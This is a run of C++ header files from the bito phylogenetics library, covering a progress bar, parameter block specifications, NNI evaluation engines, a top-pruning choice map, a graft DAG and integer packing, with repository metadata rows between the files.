// Modified slightly from https://github.com/prakhar1989/progress-cpp #pragma once #include <chrono> #include <iomanip> #include <iostream> class ProgressBar { private: unsigned int ticks = 0; const unsigned int total_ticks; const unsigned int bar_width = 70; const char complete_char = '='; const char incomplete_char = ' '; const std::chrono::steady_clock::time_point start_time = std::chrono::steady_clock::now(); public: ProgressBar(unsigned int total, unsigned int width, char complete, char incomplete) : total_ticks{total}, bar_width{width}, complete_char{complete}, incomplete_char{incomplete} {} ProgressBar(unsigned int total, unsigned int width) : total_ticks{total}, bar_width{width} {} ProgressBar(unsigned int total) : total_ticks{total} {} unsigned int operator++() { return ++ticks; } float calculate_seconds_elapsed() const { std::chrono::steady_clock::time_point now = std::chrono::steady_clock::now(); auto time_elapsed = std::chrono::duration_cast<std::chrono::milliseconds>(now - start_time).count(); return float(time_elapsed) / 1000.0; } void display(bool show_hours = false) const { float progress = static_cast<float>(ticks) / total_ticks; auto pos = static_cast<unsigned>(bar_width * progress); auto seconds_elapsed = calculate_seconds_elapsed(); std::cout << "["; for (size_t i = 0; i < bar_width; ++i) { if (i < pos) std::cout << complete_char; else if (i == pos) std::cout << ">"; else std::cout << incomplete_char; } std::cout << "] " << int(progress * 100.0) << "% " << seconds_elapsed; if (show_hours == true) { std::cout << "s " << seconds_elapsed / 60. << "m " << seconds_elapsed / 3600. << "h\r"; } else { std::cout << "s\r"; } std::cout.flush(); } void done() const { display(true); std::cout << std::endl; std::cout.flush(); } };
2,001
C++
.h
58
29.465517
88
0.628172
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,098
block_specification.hpp
phylovi_bito/src/block_specification.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // This class describes the structure of parameter collections that sit in // contiguous blocks. These structures are maps from string keys (which are the // block names) to Coordinates. See the unit tests at the bottom to see how they // work. // // There is a special key called entire_key_ which gives the entire span of the // block. #pragma once #include "eigen_sugar.hpp" #include "sugar.hpp" class BlockSpecification { public: // Block Coordinates are (starting index, block size) in a pair. using Coordinates = std::pair<size_t, size_t>; // ParamCounts are maps of (block name, number of parameters for that block). using ParamCounts = std::map<std::string, size_t>; using UnderlyingMapType = std::map<std::string, Coordinates>; // These are handy structures: maps from the block specification keys to // segments (i.e. sub-vectors) and blocks (i.e. sub-matrices). We can then // read and write to these values, which will be reflected in the original // parameter vector/matrix. using ParameterSegmentMap = std::map<std::string, EigenVectorXdRef>; using ParameterBlockMap = std::map<std::string, EigenMatrixXdRef>; BlockSpecification(ParamCounts param_counts); Coordinates Find(const std::string& key) const; void Insert(const std::string& key, Coordinates value); // Insert for string literals. void Insert(const char* key, Coordinates value); // Incorporate another BlockSpecification into `this` one by incrementing all // of the other starting indices by our parameter count. The "entire" block // coordinates from other get incorporated into this with key sub_entire_key. // The "entire" block coordinates are then updated. void Append(const std::string& sub_entire_key, BlockSpecification other); void CheckParameterVectorSize(const EigenVectorXdRef param_vector) const; void CheckParameterMatrixSize(const EigenMatrixXdRef param_matrix) const; // These methods allow us to pull out segments (i.e. sub-vectors) from vectors // and blocks from matrices depending on the coordinates of the block // specification. They are very useful for writing the SetParameters method of // BlockModels. EigenVectorXdRef ExtractSegment(EigenVectorXdRef param_vector, std::string key) const; EigenMatrixXdRef ExtractBlock(EigenMatrixXdRef param_matrix, std::string key) const; // These are explained in the definition of ParameterSegmentMap and // ParameterBlockMap. ParameterSegmentMap ParameterSegmentMapOf(EigenVectorXdRef param_vector) const; ParameterBlockMap ParameterBlockMapOf(EigenMatrixXdRef param_matrix) const; const UnderlyingMapType& GetMap() const { return map_; } // The complete range of parameter counts. size_t ParameterCount() const { return Find(entire_key_).second; }; // Here's how we set the "entire" key. In C++ we can just use these key // variables, but in Python we use the strings as dictionary keys. inline const static std::string entire_key_ = "entire"; private: UnderlyingMapType map_; // See top for description of what Entire means in this case. void InsertEntireKey(Coordinates coordinates); void EraseEntireKey() { map_.erase(entire_key_); } }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("BlockSpecification") { // As an example, kazoo has 4 parameters, and jordan has 23. BlockSpecification spec({{"kazoo", 4}, {"jordan", 23}}); // The specification stores the starting index and then the number of // parameters. Because we're using an ordered map, jordan has a lower index // than kazoo. const auto correct_spec_map = BlockSpecification::UnderlyingMapType( {{"entire", {0, 27}}, {"jordan", {0, 23}}, {"kazoo", {23, 4}}}); CHECK_EQ(spec.GetMap(), correct_spec_map); spec.Append("entire turbo and boost", BlockSpecification({{"boost", 42}, {"turbo", 666}})); // Then after appending, the new stuff gets shifted down. For example, we find // boost at 23+4=27 and turbo at 27+42=69. auto correct_appended_map = BlockSpecification::UnderlyingMapType( {{"boost", {27, 42}}, // 23+4=27 {"entire", {0, 735}}, // 4+23+42+666=735 {"entire turbo and boost", {27, 708}}, // 42+666=708 {"jordan", {0, 23}}, // {"kazoo", {23, 4}}, // {"turbo", {69, 666}}}); // 27+42=69 CHECK_EQ(spec.GetMap(), correct_appended_map); } #endif // DOCTEST_LIBRARY_INCLUDED
4,585
C++
.h
84
51.345238
88
0.722247
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,099
nni_evaluation_engine.hpp
phylovi_bito/src/nni_evaluation_engine.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // The NNI Evaluation Engine is an interfaces for the NNI Engine, that facilitates // different methods for scoring NNIs. The NNIEngine procedurally finds all NNIs // adjacent to the current DAG, then passes these NNIs to the helper NNIEvalEngine // class for scoring. Currently supports scoring by Generalized Pruning and Top Pruning // (using Likelihoods or Parsimonies). #pragma once #include "gp_dag.hpp" #include "graft_dag.hpp" #include "nni_engine_key_index.hpp" #include "dag_branch_handler.hpp" #include "gp_engine.hpp" #include "tp_engine.hpp" using NNIDoubleMap = std::map<NNIOperation, double>; // Forward declaration. class NNIEngine; // NNIEngine helper for evaluation NNIs -- base class. class NNIEvalEngine { public: using KeyIndex = NNIEngineKeyIndex; using KeyIndexPairArray = NNIEngineKeyIndexPairArray; using KeyIndexMap = NNIEngineKeyIndexMap; using KeyIndexMapPair = NNIEngineKeyIndexMapPair; explicit NNIEvalEngine(NNIEngine &nni_engine); virtual ~NNIEvalEngine() {} // ** Maintenance // Initialize Evaluation Engine. virtual void Init() { Failwith("Pure virtual function call."); } // Prepare Evaluation Engine for NNI Engine loop. virtual void Prep() { Failwith("Pure virtual function call."); } // Resize Engine for modified DAG. virtual void GrowEngineForDAG(std::optional<Reindexer> node_reindexer, std::optional<Reindexer> edge_reindexer) { Failwith("Pure virtual function call."); } // Grow engine to handle computing NNIs for all adjacent NNIs. // Option to grow engine for computing via reference or via copy. If computing via // reference, option whether to use unique temporaries (for testing and computing in // parallel). virtual void GrowEngineForAdjacentNNIs(const NNISet &adjacent_nnis, const bool via_reference = true, const bool use_unique_temps = true) { Failwith("Pure virtual function call."); } // Update engine after modifying DAG (adding nodes and edges). virtual void UpdateEngineAfterModifyingDAG( const std::map<NNIOperation, NNIOperation> &pre_nni_to_nni, const size_t prev_node_count, const Reindexer &node_reindexer, const size_t prev_edge_count, const Reindexer &edge_reindexer) { Failwith("Pure virtual function call."); } // ** Scoring // Grow Evaluation Engine to account for // Compute scores for all NNIs adjacent to current DAG. virtual void ScoreAdjacentNNIs(const NNISet &adjacent_nnis) { Failwith("Pure virtual function call."); } // Score NNI currently in DAG. Expects engine has been prepped and updated after // modifying DAG. virtual double ScoreInternalNNIByNNI(const NNIOperation &nni) const { Failwith("Pure virtual function call."); } virtual double ScoreInternalNNIByEdge(const EdgeId &edge_id) const { Failwith("Pure virtual function call."); } // Get the number of spare nodes needed per proposed NNI. virtual size_t GetSpareNodesPerNNI() const { Failwith("Pure virtual function call."); } // Get the number of spare edges needed per proposed NNI. virtual size_t GetSpareEdgesPerNNI() const { Failwith("Pure virtual function call."); } // ** Access // Get reference NNIEngine. const NNIEngine &GetNNIEngine() const { Assert(nni_engine_ != nullptr, "DAG is not set."); return *nni_engine_; } // Get reference DAG. const GPDAG &GetDAG() const { Assert(dag_ != nullptr, "DAG is not set."); return *dag_; } // Get reference GraftDAG. const GraftDAG &GetGraftDAG() const { Assert(graft_dag_ != nullptr, "GraftDAG is not set."); return *graft_dag_; } // Get all Scored NNIs. const NNIDoubleMap &GetScoredNNIs() const { return scored_nnis_; } // Get DAG branch handler. const DAGBranchHandler &GetDAGBranchHandler() const { Failwith("Pure virtual function call."); } // Retrieve Score for given NNI. double GetScoreByNNI(const NNIOperation &nni) const; // Retrieve Score for given edge in DAG. double GetScoreByEdge(const EdgeId edge_id) const; // Find maximum score in DAG. double GetMaxScore() const; // Find minimum score in DAG. double GetMinScore() const; // Determines whether to optimize edges on initialization. bool IsOptimizeOnInit() const { return optimize_on_init_; } void SetOptimizeOnInit(const bool optimize_on_init) { optimize_on_init_ = optimize_on_init; } // Determines whether new edges are optimized. bool IsOptimizeNewEdges() const { return optimize_new_edges_; } void SetOptimizeNewEdges(const bool optimize_new_edges) { optimize_new_edges_ = optimize_new_edges; } // Determines whether new edges are initialized by referencing pre-NNI edges. bool IsCopyNewEdges() const { return copy_new_edges_; } void SetCopyNewEdges(const bool copy_new_edges) { copy_new_edges_ = copy_new_edges; } // Determines maximum number of iterations to perform when optimizing edges. size_t GetOptimizationMaxIteration() const { return optimize_max_iter_; } void SetOptimizationMaxIteration(const size_t optimize_max_iter) { optimize_max_iter_ = optimize_max_iter; } protected: // Get reference NNIEngine. NNIEngine &GetNNIEngine() { Assert(nni_engine_ != nullptr, "NNIEngine is not set."); return *nni_engine_; } // Get reference DAG. GPDAG &GetDAG() { Assert(dag_ != nullptr, "DAG is not set."); return *dag_; } // Get reference GraftDAG. GraftDAG &GetGraftDAG() { Assert(graft_dag_ != nullptr, "GraftDAG is not set."); return *graft_dag_; } // Get all Scored NNIs. NNIDoubleMap &GetScoredNNIs() { return scored_nnis_; } // Un-owned reference to NNIEngine. NNIEngine *nni_engine_ = nullptr; // Un-owned reference to DAG. GPDAG *dag_ = nullptr; // Un-owned reference to GraftDAG. GraftDAG *graft_dag_ = nullptr; // Scored NNIs. NNIDoubleMap scored_nnis_; // Whether to optimize all edges in DAG on initialization. bool optimize_on_init_ = true; // Whether new branches are initialized by referencing pre-NNI lengths. bool copy_new_edges_ = true; // Whether new branches are optimized. bool optimize_new_edges_ = true; // Number of optimization iterations. size_t optimize_max_iter_ = 10; }; // NNIEngine helper for evaluating NNIs by using Generalized Pruning. Calls GPEngine // for functionality. See gp_engine.hpp for more details. class NNIEvalEngineViaGP : public NNIEvalEngine { public: NNIEvalEngineViaGP(NNIEngine &nni_engine, GPEngine &gp_engine); // ** Maintenance // Initialize EvalEngine. void Init() override; // Prepare EvalEngine for NNIEngine loop. void Prep() override; // Resize EvalEngine for modified DAG. void GrowEngineForDAG(std::optional<Reindexer> node_reindexer, std::optional<Reindexer> edge_reindexer) override; // Fetches Pre-NNI data to prep Post-NNI for score computation. Method stores // intermediate values in the GPEngine temp space (expects GPEngine has already been // resized). void GrowEngineForAdjacentNNIs(const NNISet &adjacent_nnis, const bool via_reference = true, const bool use_unique_temps = true) override; // Update engine after modifying DAG (adding nodes and edges). virtual void UpdateEngineAfterModifyingDAG( const std::map<NNIOperation, NNIOperation> &pre_nni_to_nni, const size_t prev_node_count, const Reindexer &node_reindexer, const size_t prev_edge_count, const Reindexer &edge_reindexer); // ** Scoring // Compute scores for all NNIs adjacent to current DAG. void ScoreAdjacentNNIs(const NNISet &adjacent_nnis) override; // Score NNI currently in DAG. Expects engine has been prepped and updated after // modifying DAG. double ScoreInternalNNIByNNI(const NNIOperation &nni) const override; double ScoreInternalNNIByEdge(const EdgeId &edge_id) const override; // Get the number of spare nodes needed per proposed NNI. size_t GetSpareNodesPerNNI() const override; // Get the number of spare edges needed per proposed NNI. size_t GetSpareEdgesPerNNI() const override; // ** Helpers // Compute GP likelihood for all adjacent NNIs. void ComputeAdjacentNNILikelihoods(const NNISet &adjacent_nnis, const bool via_reference); // Build GPOperations for computing GP likelihood for a single adjacent NNI. Returns // likelihood and last NNI's offset (number of edges adjacent to NNI). std::pair<double, size_t> ComputeAdjacentNNILikelihood(const NNIOperation &nni, const size_t offset = 0); template <typename T> struct AdjEdges { std::vector<T> parents; std::vector<T> sisters; T central; std::vector<T> leftchildren; std::vector<T> rightchildren; }; using AdjEdgeIds = AdjEdges<EdgeId>; using AdjEdgePCSPs = AdjEdges<Bitset>; template <typename T> struct AdjNodes { std::vector<T> grand_parents; std::vector<T> grand_sisters; T parent_focal; T parent_sister; T child_left; T child_right; std::vector<T> grand_leftchildren; std::vector<T> grand_rightchildren; }; using AdjNodeIds = AdjNodes<NodeId>; using AdjNodeSubsplits = AdjNodes<Bitset>; struct AdjPVIds { PVId parent_p; PVId parent_phatfocal; PVId parent_phatsister; PVId parent_rhat; PVId parent_rfocal; PVId parent_rsister; PVId child_p; PVId child_phatleft; PVId child_phatright; PVId child_rhat; PVId child_rleft; PVId child_rright; }; using AdjNodeAndEdgeIds = std::pair<AdjNodeIds, AdjEdgeIds>; // Get nodes and edges adjacent to NNI in DAG. AdjNodeAndEdgeIds GetAdjNodeAndEdgeIds(const NNIOperation &nni) const; // Assign temporary nodes according to pre-NNI in DAG. AdjNodeAndEdgeIds GetMappedAdjNodeIdsAndTempAdjEdgeIds( const NNIOperation &pre_nni, const NNIOperation &nni, const bool copy_branch_lengths = false); // Assign temporary nodes according to pre-NNI in DAG. AdjEdgeIds GetTempAdjEdgeIds(const AdjNodeIds &node_ids); // Assign temporary PVIds for new NNI. AdjPVIds GetTempAdjPVIds(); std::set<EdgeId> BuildSetOfEdgeIdsAdjacentToNNI(const NNIOperation &nni) const; std::set<Bitset> BuildSetOfPCSPsAdjacentToNNI(const NNIOperation &nni) const; // Copies branch length data from pre-NNI to post-NNI before optimization. void CopyGPEngineDataAfterAddingNNI(const NNIOperation &pre_nni, const NNIOperation &post_nni); // Grow engine to handle computing NNI Likelihoods for all adjacent NNIs. // Option to grow engine for computing likelihoods via reference or via copy. If // computing via reference, option whether to use unique temporaries (for testing and // computing in parallel). void GrowGPEngineForAdjacentNNILikelihoods(const NNISet &adjacent_nnis, const bool via_reference = true, const bool use_unique_temps = true); // Fetches Data from Pre-NNI for Post-NNI. Can be used for initial values when moving // accepted NNIs from Graft to Host DAG. KeyIndexMapPair PassGPEngineDataFromPreNNIToPostNNIViaCopy( const NNIOperation &pre_nni, const NNIOperation &post_nni); // Fetches Pre-NNI data to prep Post-NNI for likelihood computation. Method stores // intermediate values in the GPEngine temp space (expects GPEngine has already been // resized). KeyIndexMapPair PassGPEngineDataFromPreNNIToPostNNIViaReference( const NNIOperation &pre_nni, const NNIOperation &post_nni, const size_t nni_count, const bool use_unique_temps); // ** Branch Length Optimization // Optimize all branch lengths over DAG. void BranchLengthOptimization(); // Optimize only given branch lengths over DAG. void BranchLengthOptimization(const std::set<EdgeId> &edges_to_optimize); // Optimize only edges adjacent to an NNI. void NNIBranchLengthOptimization(const NNIOperation &nni, const std::set<EdgeId> &new_edge_ids); void NNIBranchLengthOptimization(const NNIOperation &nni); // ** Access // Un-owned reference to GPEngine. GPEngine &GetGPEngine() { return *gp_engine_; } const GPEngine &GetGPEngine() const { return *gp_engine_; } // Get DAG branch handler. const DAGBranchHandler &GetDAGBranchHandler() const { return GetGPEngine().GetBranchLengthHandler(); } protected: // Unowned reference to GPEngine. GPEngine *gp_engine_ = nullptr; // Spare work space for NNI search. size_t spare_nodes_per_nni_ = 2; size_t spare_edges_per_nni_ = 5; // Whether to use uniform SBN parameters bool use_null_priors_ = false; }; // NNIEngine helper for evaluating NNIs by using Top Pruning. Calls TPEngine // for functionality. See tp_engine.hpp for more details. class NNIEvalEngineViaTP : public NNIEvalEngine { public: NNIEvalEngineViaTP(NNIEngine &nni_engine, TPEngine &tp_engine) : NNIEvalEngine(nni_engine), tp_engine_(&tp_engine) {} // ** Maintenance // Initialize Evaluation Engine. void Init() override; // Prepare Engine for NNI Engine loop. void Prep() override; // Resize Engine for modified DAG. void GrowEngineForDAG(std::optional<Reindexer> node_reindexer, std::optional<Reindexer> edge_reindexer) override; // Fetches Pre-NNI data to prep Post-NNI for likelihood computation. Method stores // intermediate values in the GPEngine temp space (expects GPEngine has already been // resized). void GrowEngineForAdjacentNNIs(const NNISet &adjacent_nnis, const bool via_reference = true, const bool use_unique_temps = true) override; // Update engine after modifying DAG (adding nodes and edges). void UpdateEngineAfterModifyingDAG( const std::map<NNIOperation, NNIOperation> &pre_nni_to_nni, const size_t prev_node_count, const Reindexer &node_reindexer, const size_t prev_edge_count, const Reindexer &edge_reindexer) override; // ** Scoring // Compute scores for all NNIs adjacent to current DAG. void ScoreAdjacentNNIs(const NNISet &adjacent_nnis) override; // Score NNI currently in DAG. Expects engine has been prepped and updated after // modifying DAG. double ScoreInternalNNIByNNI(const NNIOperation &nni) const override; double ScoreInternalNNIByEdge(const EdgeId &edge_id) const override; // Get the number of spare nodes needed per proposed NNI. size_t GetSpareNodesPerNNI() const override; // Get the number of spare edges needed per proposed NNI. size_t GetSpareEdgesPerNNI() const override; // ** Access TPEngine &GetTPEngine() { return *tp_engine_; } const TPEngine &GetTPEngine() const { return *tp_engine_; } // Get DAG branch handler. const DAGBranchHandler &GetDAGBranchHandler() const { return GetTPEngine().GetDAGBranchHandler(); } protected: TPEngine *tp_engine_; };
15,242
C++
.h
343
39.492711
88
0.724396
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,100
tp_choice_map.hpp
phylovi_bito/src/tp_choice_map.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // A TPChoiceMap is a per-edge map of the best adjacent edges applied to a SubsplitDAG // for Top-Pruning. Used for selecting, updating, and extracting the top tree from the // DAG. A TPChoiceMap can be used to generate a TreeMask, which is a list of edge ids // which express a single, complete tree embedded in the DAG, or a Node Topology. #pragma once #include <stack> #include "sugar.hpp" #include "gp_dag.hpp" #include "node.hpp" #include "dag_data.hpp" using TreeId = GenericId<struct TreeIdTag>; class TPChoiceMap { public: // Per-edge adjacent choices for given edge. template <typename T> struct EdgeAdjacentMap { T parent; T sister; T left_child; T right_child; T &operator[](EdgeAdjacent edge_adj) { switch (edge_adj) { case EdgeAdjacent::Parent: return parent; case EdgeAdjacent::Sister: return sister; case EdgeAdjacent::LeftChild: return left_child; case EdgeAdjacent::RightChild: return right_child; }; Failwith("ERROR: Invalid enum given."); } const T &operator[](EdgeAdjacent edge_adj) const { switch (edge_adj) { case EdgeAdjacent::Parent: return parent; case EdgeAdjacent::Sister: return sister; case EdgeAdjacent::LeftChild: return left_child; case EdgeAdjacent::RightChild: return right_child; }; Failwith("ERROR: Invalid enum given."); } T &operator[](NNIClade clade) { switch (clade) { case NNIClade::ParentFocal: return parent; case NNIClade::ParentSister: return sister; case NNIClade::ChildLeft: return left_child; case NNIClade::ChildRight: return right_child; } Failwith("ERROR: Invalid enum given."); } const T &operator[](NNIClade clade) const { switch (clade) { case NNIClade::ParentFocal: return parent; case NNIClade::ParentSister: return sister; case NNIClade::ChildLeft: return left_child; case NNIClade::ChildRight: return right_child; } Failwith("ERROR: Invalid enum given."); } }; using EdgeChoice = EdgeAdjacentMap<EdgeId>; using EdgeChoiceNodeIds = EdgeAdjacentMap<NodeId>; using EdgeChoiceTreeIds = EdgeAdjacentMap<TreeId>; using EdgeChoicePCSPs = NNIAdjacentMap<Bitset>; using EdgeChoiceSubsplits = EdgeAdjacentMap<Bitset>; using EdgeChoiceNodeIdMap = EdgeAdjacentMap<std::pair<NodeId, NodeId>>; using EdgeChoicePCSPMap = EdgeAdjacentMap<std::pair<Bitset, Bitset>>; using EdgeChoiceVector = std::vector<EdgeChoice>; using TreeIdData = std::vector<TreeId>; // ** Constructors TPChoiceMap(GPDAG &dag) : dag_(dag), edge_choice_vector_(dag.EdgeCountWithLeafSubsplits()){}; // ** Access friend bool operator==(const TPChoiceMap::EdgeChoice &lhs, const TPChoiceMap::EdgeChoice &rhs) { if (lhs.parent != rhs.parent) return false; if (lhs.sister != rhs.sister) return false; if (lhs.left_child != rhs.left_child) return false; if (lhs.left_child != rhs.left_child) return false; return true; } // Size of edge choice map. size_t size() const { return edge_choice_vector_.size(); } // Get associated DAG. const GPDAG &GetDAG() const { return dag_; } // Get choice map for given edge_id. EdgeChoice &GetEdgeChoice(const EdgeId edge_id) { return edge_choice_vector_[edge_id.value_]; } const EdgeChoice &GetEdgeChoice(const EdgeId edge_id) const { return edge_choice_vector_[edge_id.value_]; } // Get adjacent edge id in given edge's choice map for adjacent edge direction. EdgeId GetEdgeChoice(const EdgeId edge_id, EdgeAdjacent edge_adj) const; // Set given edge choice map's given adjacent edge to the given new_edge_choice. void SetEdgeChoice(const EdgeId edge_id, const EdgeAdjacent edge_adj, const EdgeId new_edge_choice); // Re-initialize edge choices to NoId. void ResetEdgeChoice(const EdgeId edge_id); // Get data from edge_choice in choice map, according tp edge_id. EdgeChoiceNodeIds GetEdgeChoiceNodeIds(const EdgeId edge_id) const; EdgeChoicePCSPs GetEdgeChoicePCSPs(const EdgeId edge_id) const; EdgeChoiceSubsplits GetEdgeChoiceSubsplits(const EdgeId edge_id) const; // Get data from given edge_choice. EdgeChoiceNodeIds GetEdgeChoiceNodeIds(const EdgeChoice &edge_choice) const; EdgeChoicePCSPs GetEdgeChoicePCSPs(const EdgeChoice &edge_choice) const; EdgeChoiceSubsplits GetEdgeChoiceSubsplits(const EdgeChoice &edge_choice) const; // Apply NNI clade map transform from pre-NNI to post-NNI. template <typename T> EdgeAdjacentMap<T> RemapEdgeChoiceDataViaNNICladeMap( const EdgeAdjacentMap<T> &old_data, const NNIOperation::NNICladeArray &clade_map) const { EdgeAdjacentMap<T> new_data{old_data}; auto SetNewDataFromOldData = [&old_data, &new_data, &clade_map](const NNIClade nni_clade) { new_data[clade_map[nni_clade]] = old_data[nni_clade]; }; for (const auto nni_clade : NNICladeEnum::Iterator()) { SetNewDataFromOldData(nni_clade); } return new_data; } // ** Maintenance // Grow and reindex data to fit new DAG. Initialize new choice map to first edge. void GrowEdgeData(const size_t new_edge_count, std::optional<const Reindexer> edge_reindexer, std::optional<const size_t> explicit_alloc, const bool on_init); // ** Selectors // Naive choice selector. Chooses the first edge from each list of candidates. void SelectFirstEdge(); void SelectFirstEdge(const EdgeId edge_id); // Check if choice selection is valid. // Specifically, checks that: // - Every edge choice vector has a valid id for all options, unless... // - Edge goes to root (NoId for sister and parent). // - Edge goes to leaf (NoId for left and right child). // - Edges span every leaf and root node. bool SelectionIsValid(const bool is_quiet = true) const; // ** TreeMask // A TreeMask is a set of edge Ids, which represent a tree contained in // the DAG, from the selected subset of DAG edges. using TreeMask = std::set<EdgeId>; // Extract TreeMask from DAG based on edge choices to find best tree with given // focal edge. TreeMask ExtractTreeMask(const EdgeId initial_edge_id) const; // Checks that TreeMask represents a valid, complete tree in the DAG. // Specifically, checks that: // - There is a single edge that goes to the root. // - There is a single edge that goes to each leaf. // - For each node in mask, there is a single parent, left and right child. // - Unless node is root (no parent) or leaf (no children). bool TreeMaskIsValid(const TreeMask &tree_mask, const bool is_quiet = true) const; // Output TreeMask to string. std::string TreeMaskToString(const TreeMask &tree_mask) const; // ** Topology // Extract tree topology from DAG based on edges choices to find best tree. // Extract Topology from DAG with given focal edge. Node::Topology ExtractTopology(const EdgeId initial_edge_id) const; Node::Topology ExtractTopology(const TreeMask &tree_mask) const; // ** I/O // Output edge choice map to string by edge_id. std::string EdgeChoiceToString(const EdgeId edge_id) const; // Output edge choice map to string. static std::string EdgeChoiceToString(const EdgeChoice &edge_choice); // Output full choice map to string. std::string ToString() const; // Output choice map as a PCSP Map from the focal edge to vector of adjacent edges. using PCSPToPCSPVectorMap = std::map<Bitset, std::vector<Bitset>>; PCSPToPCSPVectorMap BuildPCSPMap() const; // Output edge choice map. friend std::ostream &operator<<(std::ostream &os, const EdgeChoice &edge_choice); // Output full choice map. friend std::ostream &operator<<(std::ostream &os, const TPChoiceMap &choice_map); private: // ** ExpandedTreeMask // The ExpandedTreeMask contains a map from all the nodes of a TreeMask to their // associated parent, left and right child. template <typename T> using NodeAdjacentArray = EnumArray<NodeAdjacent, 3, T>; using ExpandedTreeMask = std::map<NodeId, NodeAdjacentArray<NodeId>>; // Extract an ExpandedTreeMask from DAG based on a focal edge or previous TreeMask. ExpandedTreeMask ExtractExpandedTreeMask(const EdgeId focal_edge_id) const; ExpandedTreeMask ExtractExpandedTreeMask(const TreeMask &tree_mask) const; // Extract Tree based on given ExpandedTreeMask. Node::Topology ExtractTopology(ExpandedTreeMask &tree_mask_ext) const; // Output ExpandedTreeMask to a string. std::string ExpandedTreeMaskToString(const ExpandedTreeMask &tree_mask) const; // Un-owned reference DAG. GPDAG &dag_; // A vector that stores a map of each edge's best adjacent edges. EdgeChoiceVector edge_choice_vector_; // A vector that sets each edge's highest priority tree in the choice map. TreeIdData tree_priority_; };
9,228
C++
.h
210
38.8
86
0.713888
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,101
graft_dag.hpp
phylovi_bito/src/graft_dag.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // The GraftDAG is a proposed addition (graft) to SubsplitDAG (host), which we // can perform computations on without the need for adding nodes and edges and // reindexing the full DAG. #include "gp_dag.hpp" #include "subsplit_dag.hpp" #pragma once class GraftDAG : public SubsplitDAG { public: // ** Constructors: // Initialize empty GraftDAG. GraftDAG(SubsplitDAG &dag); // ** Comparators // Uses same method of comparison as SubsplitDAG (node and edge sets). int Compare(const GraftDAG &other) const; static int Compare(const GraftDAG &lhs, const GraftDAG &rhs); // Treats GraftDAG as completed DAG to compare against normal SubsplitDAG. int CompareToDAG(const SubsplitDAG &other) const; static int CompareToDAG(const GraftDAG &lhs, const SubsplitDAG &rhs); // ** Modify GraftDAG // Graft node pair to DAG. virtual ModificationResult AddNodePair(const NNIOperation &nni); virtual ModificationResult AddNodePair(const Bitset &parent_subsplit, const Bitset &child_subsplit); virtual ModificationResult AddNodes(const BitsetPairVector &node_subsplit_pairs); // Clear all nodes and edges from graft for reuse. void RemoveAllGrafts(); // ** Access // Get pointer to the host DAG. const SubsplitDAG &GetHostDAG() const; // ** Counts // Total number of nodes in graft only. size_t GraftNodeCount() const; // Total number of nodes in host DAG only. size_t HostNodeCount() const; // Total number of edges in graft only. size_t GraftEdgeCount() const; // Total number of edges in host DAG only. size_t HostEdgeCount() const; // Check if a node is from the host, otherwise from the graft. bool IsNodeFromHost(NodeId node_id) const; // Check if an edge is from the host, otherwise from the graft. bool IsEdgeFromHost(EdgeId edge_id) const; // ** Contains // Checks whether the node is in the graft only. bool ContainsGraftNode(const Bitset node_subsplit) const; bool ContainsGraftNode(const NodeId node_id) const; // Checks whether the edge is in the graft only. bool ContainsGraftEdge(const NodeId parent_id, const NodeId child_id) const; bool ContainsGraftEdge(const EdgeId edge_id) const; // ** Miscellaneous size_t GetPLVIndex(PLVType plv_type, NodeId node_id) const; protected: // DAG that the graft is connected to. SubsplitDAG &host_dag_; // Number of nodes grafted to the DAG. size_t graft_node_count_ = 0; // Number of edges grafted to the DAG. size_t graft_edge_count_ = 0; };
2,661
C++
.h
62
39.370968
83
0.741085
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,102
intpack.hpp
phylovi_bito/src/intpack.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <cstdint> #include <string> inline uint64_t PackInts(uint32_t a, uint32_t b) { return (static_cast<uint64_t>(a) << 32) + static_cast<uint64_t>(b); } inline uint32_t UnpackFirstInt(uint64_t x) { return static_cast<uint32_t>(x >> 32); } inline uint32_t UnpackSecondInt(uint64_t x) { return static_cast<uint32_t>(x & 0xffffffff); } inline std::string StringOfPackedInt(uint64_t x) { return (std::to_string(UnpackFirstInt(x)) + "_" + std::to_string(UnpackSecondInt(x))); } #ifdef DOCTEST_LIBRARY_INCLUDED inline void TestPacking(uint32_t a, uint32_t b) { auto p = PackInts(a, b); CHECK_EQ(UnpackFirstInt(p), a); CHECK_EQ(UnpackSecondInt(p), b); } TEST_CASE("intpack") { TestPacking(3, 4); TestPacking(UINT32_MAX, 4); TestPacking(3, UINT32_MAX); TestPacking(UINT32_MAX - 1, UINT32_MAX); // The ints are packed such that the first int takes priority in sorting. CHECK_LT(PackInts(0, 4), PackInts(1, 0)); } #endif // DOCTEST_LIBRARY_INCLUDED
1,113
C++
.h
30
35
88
0.726257
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,103
phylo_model.hpp
phylovi_bito/src/phylo_model.hpp
